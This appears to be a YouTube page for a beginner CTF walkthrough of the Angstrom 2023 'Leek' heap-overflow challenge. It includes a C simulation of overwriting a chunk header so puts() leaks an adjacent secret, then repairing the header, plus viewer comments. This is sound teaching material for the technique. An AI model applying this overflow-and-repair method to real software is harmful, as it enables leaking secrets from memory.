Leaking Secret Data with a Heap Overflow - "Leek" Pwn Challenge [Angstrom CTF 2023]

Views: 3,308

CryptoCat

1 day ago

Video walkthrough for the binary exploitation (pwn) challenge "Leek" from the Angstrom capture the flag (CTF) competition 2023. The challenge involves a heap overflow: we overwrite every null byte between our user-input chunk and the secret-data chunk, so that when puts() is called on our buffer it prints both chunks (nothing null-terminates our data before the secret begins). After the leak, we need to repair the header of the chunk we clobbered so that the program can keep using the heap and continue execution. We repeat this process of leaking and submitting the random (secret) bytes 100 times, at which point we receive the flag! Write-ups/tutorials aimed at beginners - hope you enjoy 🙂
#Angstrom #AngstromCTF #CTF #Pentesting #OffSec #Pwn #BinaryExploitation #Reversing #ReverseEngineering
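The leak and the header repair described above, as an added example that is not part of the video or the challenge binary. Instead of calling malloc() it models two adjacent 0x30-byte glibc chunks in a static array so the run is deterministic; the offsets (our data at 0x10, the next chunk's size field at 0x38, the secret at 0x40) are what glibc lays out for two consecutive malloc(0x28) calls carved fresh from the top chunk. The secret bytes and the unbounded copy vuln_read() are constructed for the demonstration. The low three bits of a size field are flags, so an intact header for a 0x30 chunk reads 0x31 (0x30 | PREV_INUSE) followed by seven zero bytes; those zero bytes are exactly what stops puts() until we overwrite them, and exactly what we must put back afterwards.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/*
 * Simulated heap region holding two adjacent glibc-style chunks of size 0x30
 * (added example; offsets follow glibc for two consecutive malloc(0x28) calls):
 *
 *   0x00  prev_size of A   (unused while A's predecessor is in use)
 *   0x08  size of A        0x31 = 0x30 | PREV_INUSE
 *   0x10  A: our data      0x28 usable bytes (the last 8 double as B's prev_size)
 *   0x38  size of B        0x31
 *   0x40  B: secret bytes
 */
enum {
    CHUNK_SZ   = 0x30,
    PREV_INUSE = 0x1,          /* low bit of the size field is a flag, not size */
    A_DATA     = 0x10,
    B_SIZE_OFF = 0x38,
    B_DATA     = 0x40,
    SECRET_LEN = 16,
    REGION_LEN = 0x80
};

static unsigned char heap[REGION_LEN];

static void put_le64(unsigned char *p, uint64_t v)
{
    for (int i = 0; i < 8; i++) p[i] = (unsigned char)(v >> (8 * i));
}

static uint64_t get_le64(const unsigned char *p)
{
    uint64_t v = 0;
    for (int i = 7; i >= 0; i--) v = (v << 8) | p[i];
    return v;
}

/* Fresh region: both headers intact, A zero-filled, the secret sitting in B. */
void heap_init(const unsigned char secret[SECRET_LEN])
{
    memset(heap, 0, sizeof heap);
    put_le64(heap + 0x08, CHUNK_SZ | PREV_INUSE);
    put_le64(heap + B_SIZE_OFF, CHUNK_SZ | PREV_INUSE);
    memcpy(heap + B_DATA, secret, SECRET_LEN);
}

/* The bug (constructed): input is copied into A with no bound, so any
 * len > 0x28 runs into B's size field and, beyond that, B's data. */
void vuln_read(const unsigned char *input, size_t len)
{
    memcpy(heap + A_DATA, input, len);
}

/* What puts(a) would print: every byte up to the first NUL. */
size_t puts_len(void)
{
    return strlen((const char *)heap + A_DATA);
}

/* Does B's size field still look like an intact 0x30 in-use chunk? */
int b_header_ok(void)
{
    return get_le64(heap + B_SIZE_OFF) == (CHUNK_SZ | PREV_INUSE);
}

/* Step 1: fill all 0x30 bytes between A's data and B's data (A's 0x28 bytes
 * plus B's 8-byte size field) with non-NUL bytes, then read back what puts()
 * leaks. Returns the number of secret bytes recovered; the leak necessarily
 * stops at the secret's own first NUL byte, if it has one. */
size_t leak_secret(unsigned char *out, size_t outlen)
{
    unsigned char payload[CHUNK_SZ];
    memset(payload, 'A', sizeof payload);
    vuln_read(payload, sizeof payload);

    size_t total = puts_len();
    if (total <= CHUNK_SZ) return 0;            /* strlen stopped before B */
    size_t n = total - CHUNK_SZ;
    if (n > outlen) n = outlen;
    memcpy(out, heap + B_DATA, n);
    return n;
}

/* Step 2: write the same 0x30 bytes again, this time ending with B's size
 * field restored to 0x31 followed by seven zero bytes. The 1 is PREV_INUSE;
 * any stray non-zero high byte would make the size garbage. */
int repair_header(void)
{
    unsigned char payload[CHUNK_SZ];
    memset(payload, 'B', 0x28);
    put_le64(payload + 0x28, CHUNK_SZ | PREV_INUSE);
    vuln_read(payload, sizeof payload);
    return b_header_ok();
}

/* Scenario: constructed secret (optionally with a NUL at index 5 to show the
 * truncation edge case), run the leak, return how many bytes came back intact. */
size_t scenario_leak(int with_nul)
{
    unsigned char secret[SECRET_LEN], out[SECRET_LEN];
    for (int i = 0; i < SECRET_LEN; i++) secret[i] = (unsigned char)(0xa0 + i);
    if (with_nul) secret[5] = 0;
    heap_init(secret);
    size_t n = leak_secret(out, sizeof out);
    return memcmp(out, secret, n) == 0 ? n : 0;
}

int main(void)
{
    printf("full secret leaked: %zu bytes\n", scenario_leak(0));
    printf("B header intact after leak:   %d\n", b_header_ok());
    printf("B header intact after repair: %d\n", repair_header());
    printf("secret with embedded NUL leaked: %zu bytes\n", scenario_leak(1));
    return 0;
}
```

The 0x30-byte payload is the point: 0x28 bytes fill our own chunk and the next 8 overwrite the size field, and only once all of them are non-zero does strlen() inside puts() run on into the secret. The second write is the same length but ends in a valid header, which is why the repair payload in the video is the size byte followed by zero bytes rather than more filler.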
↢Social Media↣
Twitter: / _cryptocat
GitHub: github.com/Crypto-Cat/CTF
HackTheBox: app.hackthebox.eu/profile/11897
LinkedIn: / cryptocat
Reddit: / _cryptocat23
KZfaq: / cryptocat23
Twitch: / cryptocat23
↢AngstromCTF↣
ctftime.org/event/1859
2023.angstromctf.com/challenges
/ discord
/ angstromctf
↢Resources↣
Ghidra: ghidra-sre.org/CheatSheet.html
Volatility: github.com/volatilityfoundati...
PwnTools: github.com/Gallopsled/pwntool...
CyberChef: gchq.github.io/CyberChef
DCode: www.dcode.fr/en
HackTricks: book.hacktricks.xyz/pentestin...
CTF Tools: github.com/apsdehal/awesome-ctf
Forensics: cugu.github.io/awesome-forensics
Decompile Code: www.decompiler.com
Run Code: tio.run
↢Chapters↣
Start: 0:00
Patch lib-c (pwninit): 0:20
Test the program functionality: 1:05
Check the binary protections (checksec): 1:37
Analyse decompiled code (ghidra): 2:57
Recap of analysis: 6:51
PwnTools script: 8:40
Setup breakpoints: 14:38
Debug with GDB (pwndbg): 15:33
Heap recap (chunk structure): 16:20
Reviewing vulnerability / exploit: 18:01
Finish PwnTools script: 20:40
Test against remote server: 24:13
Final recap: 25:07
End: 25:56

Comments: 28
@0xLoevland (1 year ago)
Nice work! It makes sense now why the challenge was called "Leek" xD. I ended up solving it by overwriting the secret and then "guessing" it, instead of leaking the secret.
@_CryptoCat (1 year ago)
Never thought of that but it's also a great solution!
@didko258 (1 year ago)
just searched "binary exploitation" and saw that you have posted a new video. Can't wait to check it out. :D
@_CryptoCat (1 year ago)
Thanks! It's been a while 😅
@didko258 (1 year ago)
😄
@markuche1337 (1 year ago)
Great walkthrough 😅
@_CryptoCat (1 year ago)
ty 🙏🥰
@sinner7788 (1 year ago)
Great work! I'd love to see a walkthrough of 'widget' by you. I got 30% through exploiting it, but then got stuck infinitely 😅
@_CryptoCat (1 year ago)
Thanks mate! 🙏 I only got the chance to do a few challs this time around.. a couple of web and a couple of pwn 😁
@iri5h (1 year ago)
Hey. Where do you get the ld-linux-x86-64.so.2 and libc.so.6 files? I tried spinning up a docker of the correct versions and copying those over, but after using pwninit the program just seg faults.
@_CryptoCat (1 year ago)
Hmmm I already had them saved but pretty sure that's where they came from (an Ubuntu docker container) 🤔
@sonson-br8mx (1 year ago)
kewlll
@_CryptoCat (1 year ago)
😎
@trunglongng4237 (1 year ago)
Sir, please create a video about priv escalation. Thank you ❤
@_CryptoCat (1 year ago)
Hmmm quite a few of my hackthebox vids have featured priv esc, e.g. the battlegrounds ones, but it's a huge topic.. even if you break it down into linux vs windows 😆
@trunglongng4237 (1 year ago)
@_CryptoCat Linux, please, sir. I did the monitortwo in Hack The Box but still need some hints for PE, so I'm still not clear. Hope you find it and do the same thing. Have a nice day.
@moshedo7975 (1 year ago)
When you fix the payload you put 6 "\x00" after the 0x31. Why not 7 "\x00"?
@_CryptoCat (1 year ago)
Damn.. good question! I just went back and re-tested the exploit and 6 or 7 * "\x00" both work fine, but any less than 6 null bytes fails 🤔 I didn't think about this at the time but it makes sense, since the chunk metadata has 8 bytes for the chunk size *and* some flags, e.g. to indicate if the previous chunk is in use. Therefore, I guess we only need to take care of 7 bytes for the size (\x31 + (\x00 * 6)). The last byte would overwrite those flags 🙂
@ucanh8173 (7 months ago)
Why do we have to + (b'\x00' * 6) after b'\x31'? I thought we have to overwrite the exact data until we meet the next null character? If we + (b'\x00' * 6), do we overwrite the data of the second chunk with ('\x00' * 6)?
@user-rg8uf7nj7h (9 months ago)
I got the same error with glibc and tried to install the latest version, not working. I am using the latest Parrot. Any other ways.....
@_CryptoCat (9 months ago)
Hi mate, if you are getting errors about GLIBC 2.34 you can download these files to the same directory and then use pwninit to point the challenge to the correct files: github.com/Crypto-Cat/CTF/tree/main/pwn/GLIBC_2.34
@user-rg8uf7nj7h (9 months ago)
@_CryptoCat pwninit, sorry I don't get it.
@_CryptoCat (9 months ago)
@@user-rg8uf7nj7h Check this out: github.com/io12/pwninit - basically you can patch the challenge binary to use a Lib-C version of your choice. Quite often CTFs will give you a copy of the Lib-C library, in which case pwninit is very useful. I made some small modifications to mine but the one on the github should work fine!
@darkshadow_boy (9 months ago)
@_CryptoCat can you share yours?
@_CryptoCat (9 months ago)
@darkshadow_boy Oh actually my bad, I'm using the default pwninit binary but I have a bash alias set up:

    pwninit='/home/crystal/apps/pwninit --template-path ~/.config/pwninit-template.py; sed -n "4,6p" solve.py; rm solve.py; mv *_patched $1'

where '~/.config/pwninit-template.py' is:

    from pwn import *

    {bindings}

    context.binary = {bin_name}


    def conn():
        return process({proc_args})


    def main():
        r = conn()


    if __name__ == "__main__":
        main()
@user-ie7sq8gp5q (1 year ago)
Yo dude, love the work and effort you put into these. You really do know a thing or two, lad, and you're teaching us all your wisdom. I have an assignment to do for uni by Wednesday on HackTheBox. Completed 5 machines already, but I'm literally stuck on the very easy ones (Certifried and Liberty); literally fried my brain trying to figure them out. Any advice would be greatly appreciated. If you find the solution for them (will probs take you 5 mins? 10 tops) I'll legit pay you 😂 Certifried is smb from what I gather and Liberty an nginx vuln?!